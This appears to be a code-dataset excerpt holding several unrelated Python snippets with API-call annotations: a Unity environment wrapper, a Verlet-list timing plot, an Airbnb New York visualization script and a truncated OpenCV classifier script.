env_info = self.env.reset(train_mode=train)[self.brain_name]
return env_info.vector_observations
def close(self):
self.env.close()
def step(self, actions):
actions = np.clip(actions, -1, 1)
env_info = self.env.step(actions)[self.brain_name]
next_states = env_info.vector_observations
rewards = env_info.rewards
dones = env_info.local_done
return next_states, np.array(rewards), np.array(dones)
@property
def action_shape(self):
return (self.num_agents, self.action_size)
|
[
"numpy.array",
"unityagents.UnityEnvironment",
"numpy.clip"
] |
[((468, 529), 'unityagents.UnityEnvironment', 'UnityEnvironment', ([], {'file_name': 'env_file', 'no_graphics': 'no_graphics'}), '(file_name=env_file, no_graphics=no_graphics)\n', (484, 529), False, 'from unityagents import UnityEnvironment\n'), ((1213, 1236), 'numpy.clip', 'np.clip', (['actions', '(-1)', '(1)'], {}), '(actions, -1, 1)\n', (1220, 1236), True, 'import numpy as np\n'), ((1447, 1464), 'numpy.array', 'np.array', (['rewards'], {}), '(rewards)\n', (1455, 1464), True, 'import numpy as np\n'), ((1466, 1481), 'numpy.array', 'np.array', (['dones'], {}), '(dones)\n', (1474, 1481), True, 'import numpy as np\n')]
|
import matplotlib.pyplot as plt
import numpy as np
import re
import os
import sys
from matplotlib import rcParams
from cycler import cycler
import itertools
if len(sys.argv) < 2:
print("Especifique la carpeta con resultados con la siguiente sintaxis:")
print("python %s carpeta_resultados" % sys.argv[0])
exit(1)
results_folder = sys.argv[1]
digit = r'\d*\.?\d+'
regex = r'^result_(%s)_(%s)_%s_\w+_%s_%s_%s_%s_\w+_%s_\.txt$' % (digit, digit, digit, digit, digit, digit, digit, digit)
"""
print(regex)
tomatch = 'result_1.1000_0.6000_50.0000_WallPeriodicBC_1_0.5000_1_0.0100_False_1024_.txt'
matches = re.match(regex, tomatch)
if matches:
print(matches.group(1))
print(matches.group(2))
else:
print("no match")
"""
files = os.listdir(results_folder)
time_lambda_curves = {}
for filename in files:
matches = re.match(regex, filename)
if not matches:
continue
the_lambda = float(matches.group(1))
the_eta = float(matches.group(2))
with open(results_folder + filename, 'r') as f:
first_line = f.readline()
the_time = float(first_line)
if the_eta not in time_lambda_curves:
time_lambda_curves[the_eta] = {
'times': [],
'lambdas': []
}
time_lambda_curves[the_eta]['times'].append(the_time)
time_lambda_curves[the_eta]['lambdas'].append(the_lambda)
marker = itertools.cycle(('s', 'X', '+', 'o', '*', '>', 'h', 'd', '.'))
lines = itertools.cycle((':', '-.', '--', '-'))
# Configuraciones de estilo de los graficos
plt.figure(figsize=(12, 10), dpi=80, facecolor='w', edgecolor='k')
plt.rc('lines', linewidth=1)
plt.rc('axes', prop_cycle=(cycler('color', ['blue', 'green', 'red',
'magenta', 'black',
'purple', 'pink', 'brown',
'orange', 'coral',
'lightblue', 'lime', 'lavender',
'turquoise', 'darkgreen', 'tan',
'salmon', 'gold',
'darkred', 'darkblue'])))
to_plot = []
for eta, values in time_lambda_curves.items():
to_plot.append((eta, values))
to_plot.sort()
#for eta, values in time_lambda_curves.items():
for eta, values in to_plot:
the_times = values['times']
the_lambdas = values['lambdas']
order = np.argsort(the_lambdas)
xs = np.array(the_lambdas)[order]
ys = np.array(the_times)[order]
plt.plot(xs, ys, label="$\eta = %.1f$" % eta, marker=next(marker), markersize=15, linewidth=3)
plt.xticks(np.arange(0.0, 1.4, 0.1))
plt.yticks(np.arange(0, 10001, 1000))
plt.xlabel('$\lambda$', fontsize=18)
plt.ylabel('Tiempo (s)', fontsize=18)
plt.title('Tiempo de ejecución del algoritmo de Listas de Verlet\n para un tiempo de simulación físico de 50 segundos', fontsize=22, y=1.02)
#plot.legend(loc=2, prop={'size': 6})
plt.legend(prop={'size': 16})
plt.grid(alpha=0.5)
plt.show()
|
[
"matplotlib.pyplot.title",
"cycler.cycler",
"matplotlib.pyplot.show",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.ylabel",
"re.match",
"numpy.argsort",
"matplotlib.pyplot.figure",
"numpy.array",
"matplotlib.pyplot.rc",
"numpy.arange",
"itertools.cycle",
"matplotlib.pyplot.xlabel",
"matplotlib.pyplot.grid",
"os.listdir"
] |
[((753, 779), 'os.listdir', 'os.listdir', (['results_folder'], {}), '(results_folder)\n', (763, 779), False, 'import os\n'), ((1396, 1458), 'itertools.cycle', 'itertools.cycle', (["('s', 'X', '+', 'o', '*', '>', 'h', 'd', '.')"], {}), "(('s', 'X', '+', 'o', '*', '>', 'h', 'd', '.'))\n", (1411, 1458), False, 'import itertools\n'), ((1467, 1506), 'itertools.cycle', 'itertools.cycle', (["(':', '-.', '--', '-')"], {}), "((':', '-.', '--', '-'))\n", (1482, 1506), False, 'import itertools\n'), ((1552, 1618), 'matplotlib.pyplot.figure', 'plt.figure', ([], {'figsize': '(12, 10)', 'dpi': '(80)', 'facecolor': '"""w"""', 'edgecolor': '"""k"""'}), "(figsize=(12, 10), dpi=80, facecolor='w', edgecolor='k')\n", (1562, 1618), True, 'import matplotlib.pyplot as plt\n'), ((1619, 1647), 'matplotlib.pyplot.rc', 'plt.rc', (['"""lines"""'], {'linewidth': '(1)'}), "('lines', linewidth=1)\n", (1625, 1647), True, 'import matplotlib.pyplot as plt\n'), ((3019, 3048), 'matplotlib.pyplot.legend', 'plt.legend', ([], {'prop': "{'size': 16}"}), "(prop={'size': 16})\n", (3029, 3048), True, 'import matplotlib.pyplot as plt\n'), ((3049, 3068), 'matplotlib.pyplot.grid', 'plt.grid', ([], {'alpha': '(0.5)'}), '(alpha=0.5)\n', (3057, 3068), True, 'import matplotlib.pyplot as plt\n'), ((3069, 3079), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3077, 3079), True, 'import matplotlib.pyplot as plt\n'), ((843, 868), 're.match', 're.match', (['regex', 'filename'], {}), '(regex, filename)\n', (851, 868), False, 'import re\n'), ((2470, 2493), 'numpy.argsort', 'np.argsort', (['the_lambdas'], {}), '(the_lambdas)\n', (2480, 2493), True, 'import numpy as np\n'), ((2756, 2793), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""$\\\\lambda$"""'], {'fontsize': '(18)'}), "('$\\\\lambda$', fontsize=18)\n", (2766, 2793), True, 'import matplotlib.pyplot as plt\n'), ((2797, 2834), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Tiempo (s)"""'], {'fontsize': '(18)'}), "('Tiempo (s)', fontsize=18)\n", (2807, 2834), True, 'import matplotlib.pyplot as plt\n'), ((2839, 2992), 'matplotlib.pyplot.title', 'plt.title', (['"""Tiempo de ejecución del algoritmo de Listas de Verlet\n para un tiempo de simulación físico de 50 segundos"""'], {'fontsize': '(22)', 'y': '(1.02)'}), '(\n """Tiempo de ejecución del algoritmo de Listas de Verlet\n para un tiempo de simulación físico de 50 segundos"""\n , fontsize=22, y=1.02)\n', (2848, 2992), True, 'import matplotlib.pyplot as plt\n'), ((1675, 1897), 'cycler.cycler', 'cycler', (['"""color"""', "['blue', 'green', 'red', 'magenta', 'black', 'purple', 'pink', 'brown',\n 'orange', 'coral', 'lightblue', 'lime', 'lavender', 'turquoise',\n 'darkgreen', 'tan', 'salmon', 'gold', 'darkred', 'darkblue']"], {}), "('color', ['blue', 'green', 'red', 'magenta', 'black', 'purple',\n 'pink', 'brown', 'orange', 'coral', 'lightblue', 'lime', 'lavender',\n 'turquoise', 'darkgreen', 'tan', 'salmon', 'gold', 'darkred', 'darkblue'])\n", (1681, 1897), False, 'from cycler import cycler\n'), ((2504, 2525), 'numpy.array', 'np.array', (['the_lambdas'], {}), '(the_lambdas)\n', (2512, 2525), True, 'import numpy as np\n'), ((2542, 2561), 'numpy.array', 'np.array', (['the_times'], {}), '(the_times)\n', (2550, 2561), True, 'import numpy as np\n'), ((2684, 2708), 'numpy.arange', 'np.arange', (['(0.0)', '(1.4)', '(0.1)'], {}), '(0.0, 1.4, 0.1)\n', (2693, 2708), True, 'import numpy as np\n'), ((2725, 2750), 'numpy.arange', 'np.arange', (['(0)', '(10001)', '(1000)'], {}), '(0, 10001, 1000)\n', (2734, 2750), True, 'import numpy as np\n')]
|
import csv
import numpy as np
import matplotlib
import matplotlib.pyplot as plt
import matplotlib.ticker as tck
from PIL import Image
# for testing purposes, remove this later!
from sys import exit
"""Data visualization on the Airbnb New York dataset from Kaggle.
The dataset provides 16 pieces of data in the following order:
0: id
1: name
2: host_id
3: host_name
4: neighbourhood_group
5: neighbourhood
6: latitude
7: longitude
8: room_type
9: price
10: minimum_nights
11: number_of_reviews
12: last_review
13: reviews_per_month
14: calculated_host_listings_count
15: availability_365
All fields are fairly self-explanatory. I will not be using the 'id' or the
'host_id' field since they are not relevant, and the 'name' field since it does
not make sense to in this context.
This project is fully open source and free to use and share. Enjoy!
"""
header = []
data = {}
num_columns = 16
num_entries = 0
with open('new_york_data.csv', encoding='utf-8') as csv_file:
reader = csv.reader(csv_file, delimiter=',')
# read the header
header = next(reader)
# read the entries
body = []
for row in reader:
body.append(row)
num_entries = len(body)
# parse the entries into np arrays and store them under in the data list
for i in range(num_columns):
dtype = 'str'
# price, minimum nights, number of reviews
# calculated host listings count, annual availability
if i == 9 or i == 10 or i == 11 or i == 14 or i == 15:
dtype = 'int64'
# latitude, longitude, review per month
if i == 6 or i == 7 or i == 13:
dtype = 'float64'
# reviews per month is blank sometimes in the original dataset
if i == 13:
# numpy cannot process empty strings to floats; so check for this
col_data = np.asarray([body[j][i] if len(body[j][i]) > 0 else 0.0 for j in range(num_entries)], dtype=dtype)
else:
col_data = np.asarray([body[j][i] for j in range(num_entries)], dtype=dtype)
data[header[i]] = col_data
# Area that the cover maps; experimentally determined
# (latitude, longitude)
min_coords = (40.49279, -74.26442)
max_coords = (40.91906, -73.68299)
long_range = max_coords[1] - min_coords[1]
lat_range = max_coords[0] - min_coords[0]
image_extent = (min_coords[1], max_coords[1], min_coords[0], max_coords[0])
new_york_img = Image.open('new_york_map.png')
# use large figure sizes
matplotlib.rcParams['figure.figsize'] = (12, 7)
# Room Type Bar Graph
room_types, room_types_count = np.unique(data['room_type'], return_counts=True)
plt.title('Distribution of Room Types')
room_types_norm = room_types_count / sum(room_types_count)
plt.barh(room_types, room_types_norm)
ax = plt.gca()
ax.xaxis.set_major_formatter(tck.FuncFormatter(lambda x, _: '{:.0%}'.format(x)))
plt.show()
# Neighbourhood Groups
n_groups, n_groups_count = np.unique(data['neighbourhood_group'], return_counts=True)
n_groups_colors = ['#1a535c', '#4ecdc4', '#b2ff66', '#ff6b6b', '#ffe66d']
explode = np.zeros((len(n_groups),), dtype='float64')
for idx, group in enumerate(n_groups):
if group == 'Manhattan':
explode[idx] = 0.1
break
plt.title('Distribution of Neighbourhood Groups')
wedges, texts, _ = plt.pie(
n_groups_count,
labels=n_groups,
explode=explode,
autopct='%1.1f%%',
pctdistance=0.8,
colors=n_groups_colors)
plt.show()
# Neighbourhoods
nbhs, nbhs_count = np.unique(data['neighbourhood'], return_counts=True)
# zip the neighbourhood name and count into a tuple to sort by count
nbhs_sorted_tuples = sorted(list(zip(nbhs, nbhs_count)), key=lambda elem: elem[1], reverse=True)
# unzip the sorted tuples back into a list of names and a list of counts
nbhs_sorted, nbhs_sorted_count = list(zip(*nbhs_sorted_tuples))
# take only the top 20
nbhs_sorted = nbhs_sorted[:20]
nbhs_sorted_count = nbhs_sorted_count[:20]
nbhs_price_avgs = []
for nbh in nbhs_sorted:
prices = data['price'][data['neighbourhood'] == nbh]
nbhs_price_avgs.append(np.average(prices))
fig, ax1 = plt.subplots()
plt.title('Most Popular Neighbourhoods and Average Price')
# pad the bottom of the plot to prevent text clipping
plt.subplots_adjust(bottom=0.2)
# rotate the labels so that they are easier to read
ax1.set_xticklabels(nbhs_sorted, rotation=45, ha='right')
ax1.set_xlabel('Neighbourhood');
# plot number of places on the left y-axis
ax1.bar(nbhs_sorted, nbhs_sorted_count, width=-0.2, align='edge')
ax1.set_ylabel('Number of places (blue)')
# plot average price on the right y-axis
ax2 = ax1.twinx()
ax2.bar(nbhs_sorted, nbhs_price_avgs, width=0.2, align='edge', color='orange')
ax2.set_ylabel('Average price (orange)')
plt.show()
# Price Histogram
group_prices = []
# separate the price data based on neighbourhood groups
for group in n_groups:
group_prices.append(data['price'][data['neighbourhood_group'] == group])
# plot the price data for each group separately as stacked bars
# use only prices less than 500 since most of the data belongs in this range
# this also lets us not worry about huge outliers (there are a few places whose
# nightly price is in the many thousands)
plt.hist(
group_prices,
histtype='barstacked',
bins=25,
range=(0, 500),
edgecolor='white',
color=n_groups_colors)
plt.legend(n_groups, loc='upper right')
plt.title('Distribution of Price per Night')
plt.xlim(0, 500)
plt.ylabel('Number of places')
plt.xlabel('Price range (USD)')
plt.show()
# Average Price Heatmap
# compute the average pricing over a grid of 150 by 150
price_heatmap_bins = 150
price_heatmap_sum = np.zeros((price_heatmap_bins, price_heatmap_bins), dtype='float64')
price_heatmap_count = np.zeros((price_heatmap_bins, price_heatmap_bins), dtype='float64')
for long, lat, price in zip(data['longitude'], data['latitude'], data['price']):
# take only prices below 500 to be consistent with price histogram
if price < 500:
idx_long = int((long - min_coords[1]) / long_range * price_heatmap_bins)
idx_lat = int((lat - min_coords[0]) / lat_range * price_heatmap_bins)
price_heatmap_sum[idx_lat, idx_long] += price
price_heatmap_count[idx_lat, idx_long] += 1
# ensure that a divide by zero will not occur
price_heatmap_count = np.clip(price_heatmap_count, 1, None)
price_heatmap = price_heatmap_sum / price_heatmap_count
plt.imshow(new_york_img, extent=image_extent)
plt.imshow(price_heatmap, extent=image_extent, origin='lower', alpha=0.9)
plt.colorbar()
plt.title('Average Price per Night Heatmap')
plt.show()
# Housing Scatter Plot
plt.imshow(new_york_img, extent=image_extent)
# divide locations based on groups and display them as a scatter on the New York map
for group, color in zip(n_groups, n_groups_colors):
plt.scatter(
data['longitude'][data['neighbourhood_group'] == group],
data['latitude'][data['neighbourhood_group'] == group],
s=2,
color=color)
plt.legend(n_groups, loc='upper left', markerscale=5)
plt.title('Plot of Housing Locations')
plt.xlabel('Longitude')
plt.ylabel('Latitude')
plt.show()
# Housing Heatmap
plt.imshow(new_york_img, extent=image_extent)
plt.hist2d(data['longitude'], data['latitude'], bins=150, alpha=0.7)
plt.title('Heatmap of Housing Locations')
plt.colorbar()
plt.xlabel('Longitude')
plt.ylabel('Latitude')
plt.show()
# Minimum Nights Distribution
group_min_nights = []
# separate the price data based on neighbourhood groups
for group in n_groups:
group_min_nights.append(data['minimum_nights'][data['neighbourhood_group'] == group])
# plot the price data for each group separately as stacked bars
plt.hist(
group_min_nights,
histtype='barstacked',
bins=20,
range=(1, 21),
edgecolor='white',
color=n_groups_colors)
plt.title('Minimum Number of Nights Required')
plt.legend(n_groups, loc='upper right')
plt.xlim(1, 21)
plt.xticks(np.arange(1, 21))
plt.xlabel('Minimum Nights')
plt.ylabel('Number of Places')
plt.show()
# Number of Reviews
# compute the average number of reviews over a grid of 150 by 150
num_reviews_bins = 150
num_reviews_sum = np.zeros((num_reviews_bins, num_reviews_bins), dtype='float64')
num_reviews_count = np.zeros((num_reviews_bins, num_reviews_bins), dtype='float64')
for long, lat, price in zip(data['longitude'], data['latitude'], data['number_of_reviews']):
idx_long = int((long - min_coords[1]) / long_range * num_reviews_bins)
idx_lat = int((lat - min_coords[0]) / lat_range * num_reviews_bins)
num_reviews_sum[idx_lat, idx_long] += price
num_reviews_count[idx_lat, idx_long] += 1
# ensure that a divide by zero will not occur
num_reviews_count = np.clip(num_reviews_count, 1, None)
num_reviews = num_reviews_sum / num_reviews_count
plt.imshow(new_york_img, extent=image_extent)
plt.imshow(num_reviews, extent=image_extent, origin='lower', alpha=0.9)
plt.colorbar()
plt.title('Average Number of Reviews Heatmap')
plt.show()
|
[
"matplotlib.pyplot.title",
"csv.reader",
"numpy.clip",
"numpy.arange",
"matplotlib.pyplot.gca",
"numpy.unique",
"matplotlib.pyplot.imshow",
"matplotlib.pyplot.colorbar",
"matplotlib.pyplot.subplots",
"matplotlib.pyplot.show",
"numpy.average",
"matplotlib.pyplot.legend",
"matplotlib.pyplot.barh",
"matplotlib.pyplot.pie",
"matplotlib.pyplot.hist2d",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.subplots_adjust",
"matplotlib.pyplot.xlim",
"matplotlib.pyplot.hist",
"matplotlib.pyplot.scatter",
"numpy.zeros",
"PIL.Image.open",
"matplotlib.pyplot.xlabel"
] |
[((2392, 2422), 'PIL.Image.open', 'Image.open', (['"""new_york_map.png"""'], {}), "('new_york_map.png')\n", (2402, 2422), False, 'from PIL import Image\n'), ((2551, 2599), 'numpy.unique', 'np.unique', (["data['room_type']"], {'return_counts': '(True)'}), "(data['room_type'], return_counts=True)\n", (2560, 2599), True, 'import numpy as np\n'), ((2600, 2639), 'matplotlib.pyplot.title', 'plt.title', (['"""Distribution of Room Types"""'], {}), "('Distribution of Room Types')\n", (2609, 2639), True, 'import matplotlib.pyplot as plt\n'), ((2699, 2736), 'matplotlib.pyplot.barh', 'plt.barh', (['room_types', 'room_types_norm'], {}), '(room_types, room_types_norm)\n', (2707, 2736), True, 'import matplotlib.pyplot as plt\n'), ((2742, 2751), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (2749, 2751), True, 'import matplotlib.pyplot as plt\n'), ((2833, 2843), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (2841, 2843), True, 'import matplotlib.pyplot as plt\n'), ((2895, 2953), 'numpy.unique', 'np.unique', (["data['neighbourhood_group']"], {'return_counts': '(True)'}), "(data['neighbourhood_group'], return_counts=True)\n", (2904, 2953), True, 'import numpy as np\n'), ((3192, 3241), 'matplotlib.pyplot.title', 'plt.title', (['"""Distribution of Neighbourhood Groups"""'], {}), "('Distribution of Neighbourhood Groups')\n", (3201, 3241), True, 'import matplotlib.pyplot as plt\n'), ((3261, 3382), 'matplotlib.pyplot.pie', 'plt.pie', (['n_groups_count'], {'labels': 'n_groups', 'explode': 'explode', 'autopct': '"""%1.1f%%"""', 'pctdistance': '(0.8)', 'colors': 'n_groups_colors'}), "(n_groups_count, labels=n_groups, explode=explode, autopct='%1.1f%%',\n pctdistance=0.8, colors=n_groups_colors)\n", (3268, 3382), True, 'import matplotlib.pyplot as plt\n'), ((3404, 3414), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (3412, 3414), True, 'import matplotlib.pyplot as plt\n'), ((3452, 3504), 'numpy.unique', 'np.unique', (["data['neighbourhood']"], {'return_counts': '(True)'}), "(data['neighbourhood'], return_counts=True)\n", (3461, 3504), True, 'import numpy as np\n'), ((4065, 4079), 'matplotlib.pyplot.subplots', 'plt.subplots', ([], {}), '()\n', (4077, 4079), True, 'import matplotlib.pyplot as plt\n'), ((4080, 4138), 'matplotlib.pyplot.title', 'plt.title', (['"""Most Popular Neighbourhoods and Average Price"""'], {}), "('Most Popular Neighbourhoods and Average Price')\n", (4089, 4138), True, 'import matplotlib.pyplot as plt\n'), ((4193, 4224), 'matplotlib.pyplot.subplots_adjust', 'plt.subplots_adjust', ([], {'bottom': '(0.2)'}), '(bottom=0.2)\n', (4212, 4224), True, 'import matplotlib.pyplot as plt\n'), ((4698, 4708), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (4706, 4708), True, 'import matplotlib.pyplot as plt\n'), ((5165, 5281), 'matplotlib.pyplot.hist', 'plt.hist', (['group_prices'], {'histtype': '"""barstacked"""', 'bins': '(25)', 'range': '(0, 500)', 'edgecolor': '"""white"""', 'color': 'n_groups_colors'}), "(group_prices, histtype='barstacked', bins=25, range=(0, 500),\n edgecolor='white', color=n_groups_colors)\n", (5173, 5281), True, 'import matplotlib.pyplot as plt\n'), ((5303, 5342), 'matplotlib.pyplot.legend', 'plt.legend', (['n_groups'], {'loc': '"""upper right"""'}), "(n_groups, loc='upper right')\n", (5313, 5342), True, 'import matplotlib.pyplot as plt\n'), ((5343, 5387), 'matplotlib.pyplot.title', 'plt.title', (['"""Distribution of Price per Night"""'], {}), "('Distribution of Price per Night')\n", (5352, 5387), True, 'import matplotlib.pyplot as plt\n'), ((5388, 5404), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(0)', '(500)'], {}), '(0, 500)\n', (5396, 5404), True, 'import matplotlib.pyplot as plt\n'), ((5405, 5435), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Number of places"""'], {}), "('Number of places')\n", (5415, 5435), True, 'import matplotlib.pyplot as plt\n'), ((5436, 5467), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Price range (USD)"""'], {}), "('Price range (USD)')\n", (5446, 5467), True, 'import matplotlib.pyplot as plt\n'), ((5468, 5478), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (5476, 5478), True, 'import matplotlib.pyplot as plt\n'), ((5605, 5672), 'numpy.zeros', 'np.zeros', (['(price_heatmap_bins, price_heatmap_bins)'], {'dtype': '"""float64"""'}), "((price_heatmap_bins, price_heatmap_bins), dtype='float64')\n", (5613, 5672), True, 'import numpy as np\n'), ((5695, 5762), 'numpy.zeros', 'np.zeros', (['(price_heatmap_bins, price_heatmap_bins)'], {'dtype': '"""float64"""'}), "((price_heatmap_bins, price_heatmap_bins), dtype='float64')\n", (5703, 5762), True, 'import numpy as np\n'), ((6268, 6305), 'numpy.clip', 'np.clip', (['price_heatmap_count', '(1)', 'None'], {}), '(price_heatmap_count, 1, None)\n', (6275, 6305), True, 'import numpy as np\n'), ((6362, 6407), 'matplotlib.pyplot.imshow', 'plt.imshow', (['new_york_img'], {'extent': 'image_extent'}), '(new_york_img, extent=image_extent)\n', (6372, 6407), True, 'import matplotlib.pyplot as plt\n'), ((6408, 6481), 'matplotlib.pyplot.imshow', 'plt.imshow', (['price_heatmap'], {'extent': 'image_extent', 'origin': '"""lower"""', 'alpha': '(0.9)'}), "(price_heatmap, extent=image_extent, origin='lower', alpha=0.9)\n", (6418, 6481), True, 'import matplotlib.pyplot as plt\n'), ((6482, 6496), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (6494, 6496), True, 'import matplotlib.pyplot as plt\n'), ((6497, 6541), 'matplotlib.pyplot.title', 'plt.title', (['"""Average Price per Night Heatmap"""'], {}), "('Average Price per Night Heatmap')\n", (6506, 6541), True, 'import matplotlib.pyplot as plt\n'), ((6542, 6552), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (6550, 6552), True, 'import matplotlib.pyplot as plt\n'), ((6577, 6622), 'matplotlib.pyplot.imshow', 'plt.imshow', (['new_york_img'], {'extent': 'image_extent'}), '(new_york_img, extent=image_extent)\n', (6587, 6622), True, 'import matplotlib.pyplot as plt\n'), ((6940, 6993), 'matplotlib.pyplot.legend', 'plt.legend', (['n_groups'], {'loc': '"""upper left"""', 'markerscale': '(5)'}), "(n_groups, loc='upper left', markerscale=5)\n", (6950, 6993), True, 'import matplotlib.pyplot as plt\n'), ((6994, 7032), 'matplotlib.pyplot.title', 'plt.title', (['"""Plot of Housing Locations"""'], {}), "('Plot of Housing Locations')\n", (7003, 7032), True, 'import matplotlib.pyplot as plt\n'), ((7033, 7056), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Longitude"""'], {}), "('Longitude')\n", (7043, 7056), True, 'import matplotlib.pyplot as plt\n'), ((7057, 7079), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Latitude"""'], {}), "('Latitude')\n", (7067, 7079), True, 'import matplotlib.pyplot as plt\n'), ((7080, 7090), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7088, 7090), True, 'import matplotlib.pyplot as plt\n'), ((7110, 7155), 'matplotlib.pyplot.imshow', 'plt.imshow', (['new_york_img'], {'extent': 'image_extent'}), '(new_york_img, extent=image_extent)\n', (7120, 7155), True, 'import matplotlib.pyplot as plt\n'), ((7156, 7224), 'matplotlib.pyplot.hist2d', 'plt.hist2d', (["data['longitude']", "data['latitude']"], {'bins': '(150)', 'alpha': '(0.7)'}), "(data['longitude'], data['latitude'], bins=150, alpha=0.7)\n", (7166, 7224), True, 'import matplotlib.pyplot as plt\n'), ((7225, 7266), 'matplotlib.pyplot.title', 'plt.title', (['"""Heatmap of Housing Locations"""'], {}), "('Heatmap of Housing Locations')\n", (7234, 7266), True, 'import matplotlib.pyplot as plt\n'), ((7267, 7281), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (7279, 7281), True, 'import matplotlib.pyplot as plt\n'), ((7282, 7305), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Longitude"""'], {}), "('Longitude')\n", (7292, 7305), True, 'import matplotlib.pyplot as plt\n'), ((7306, 7328), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Latitude"""'], {}), "('Latitude')\n", (7316, 7328), True, 'import matplotlib.pyplot as plt\n'), ((7329, 7339), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7337, 7339), True, 'import matplotlib.pyplot as plt\n'), ((7626, 7745), 'matplotlib.pyplot.hist', 'plt.hist', (['group_min_nights'], {'histtype': '"""barstacked"""', 'bins': '(20)', 'range': '(1, 21)', 'edgecolor': '"""white"""', 'color': 'n_groups_colors'}), "(group_min_nights, histtype='barstacked', bins=20, range=(1, 21),\n edgecolor='white', color=n_groups_colors)\n", (7634, 7745), True, 'import matplotlib.pyplot as plt\n'), ((7767, 7813), 'matplotlib.pyplot.title', 'plt.title', (['"""Minimum Number of Nights Required"""'], {}), "('Minimum Number of Nights Required')\n", (7776, 7813), True, 'import matplotlib.pyplot as plt\n'), ((7814, 7853), 'matplotlib.pyplot.legend', 'plt.legend', (['n_groups'], {'loc': '"""upper right"""'}), "(n_groups, loc='upper right')\n", (7824, 7853), True, 'import matplotlib.pyplot as plt\n'), ((7854, 7869), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(1)', '(21)'], {}), '(1, 21)\n', (7862, 7869), True, 'import matplotlib.pyplot as plt\n'), ((7899, 7927), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""Minimum Nights"""'], {}), "('Minimum Nights')\n", (7909, 7927), True, 'import matplotlib.pyplot as plt\n'), ((7928, 7958), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""Number of Places"""'], {}), "('Number of Places')\n", (7938, 7958), True, 'import matplotlib.pyplot as plt\n'), ((7959, 7969), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (7967, 7969), True, 'import matplotlib.pyplot as plt\n'), ((8098, 8161), 'numpy.zeros', 'np.zeros', (['(num_reviews_bins, num_reviews_bins)'], {'dtype': '"""float64"""'}), "((num_reviews_bins, num_reviews_bins), dtype='float64')\n", (8106, 8161), True, 'import numpy as np\n'), ((8182, 8245), 'numpy.zeros', 'np.zeros', (['(num_reviews_bins, num_reviews_bins)'], {'dtype': '"""float64"""'}), "((num_reviews_bins, num_reviews_bins), dtype='float64')\n", (8190, 8245), True, 'import numpy as np\n'), ((8646, 8681), 'numpy.clip', 'np.clip', (['num_reviews_count', '(1)', 'None'], {}), '(num_reviews_count, 1, None)\n', (8653, 8681), True, 'import numpy as np\n'), ((8732, 8777), 'matplotlib.pyplot.imshow', 'plt.imshow', (['new_york_img'], {'extent': 'image_extent'}), '(new_york_img, extent=image_extent)\n', (8742, 8777), True, 'import matplotlib.pyplot as plt\n'), ((8778, 8849), 'matplotlib.pyplot.imshow', 'plt.imshow', (['num_reviews'], {'extent': 'image_extent', 'origin': '"""lower"""', 'alpha': '(0.9)'}), "(num_reviews, extent=image_extent, origin='lower', alpha=0.9)\n", (8788, 8849), True, 'import matplotlib.pyplot as plt\n'), ((8850, 8864), 'matplotlib.pyplot.colorbar', 'plt.colorbar', ([], {}), '()\n', (8862, 8864), True, 'import matplotlib.pyplot as plt\n'), ((8865, 8911), 'matplotlib.pyplot.title', 'plt.title', (['"""Average Number of Reviews Heatmap"""'], {}), "('Average Number of Reviews Heatmap')\n", (8874, 8911), True, 'import matplotlib.pyplot as plt\n'), ((8912, 8922), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (8920, 8922), True, 'import matplotlib.pyplot as plt\n'), ((988, 1023), 'csv.reader', 'csv.reader', (['csv_file'], {'delimiter': '""","""'}), "(csv_file, delimiter=',')\n", (998, 1023), False, 'import csv\n'), ((6764, 6911), 'matplotlib.pyplot.scatter', 'plt.scatter', (["data['longitude'][data['neighbourhood_group'] == group]", "data['latitude'][data['neighbourhood_group'] == group]"], {'s': '(2)', 'color': 'color'}), "(data['longitude'][data['neighbourhood_group'] == group], data[\n 'latitude'][data['neighbourhood_group'] == group], s=2, color=color)\n", (6775, 6911), True, 'import matplotlib.pyplot as plt\n'), ((7881, 7897), 'numpy.arange', 'np.arange', (['(1)', '(21)'], {}), '(1, 21)\n', (7890, 7897), True, 'import numpy as np\n'), ((4034, 4052), 'numpy.average', 'np.average', (['prices'], {}), '(prices)\n', (4044, 4052), True, 'import numpy as np\n')]
|
# -*- coding: utf-8 -*-
import cv2
import argparse
import time
import numpy as np
from training import Model
classes = []
FRAME_SIZE = 256
font = cv2.FONT_HERSHEY_SIMPLEX
switch = False
def detect(image):
crop_image = image[112:112 + FRAME_SIZE, 192:192 + FRAME_SIZE]
result = model.predict(crop_image)
index = np.argmax(result)
cv2.putText(image, classes[index], (192, 112), font, 1, (0, 255, 0), 2)
def crop_save(image):
crop_image = image[112 + 2:112 + FRAME_SIZE - 2, 192 + 2:192 + FRAME_SIZE - 2]
timestamp = str(time.time())
cv2.imwrite(
'C:\\Users\Akira.DESKTOP-HM7OVCC\Desktop\database\\' + timestamp + '.png',
crop_image,
(cv2.IMWRITE_PNG_COMPRESSION, 0)
)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument(
'--model_dir',
type=str,
help='folder contains model and labels'
)
args = parser.parse_args()
if args.model_dir:
model = Model()
try:
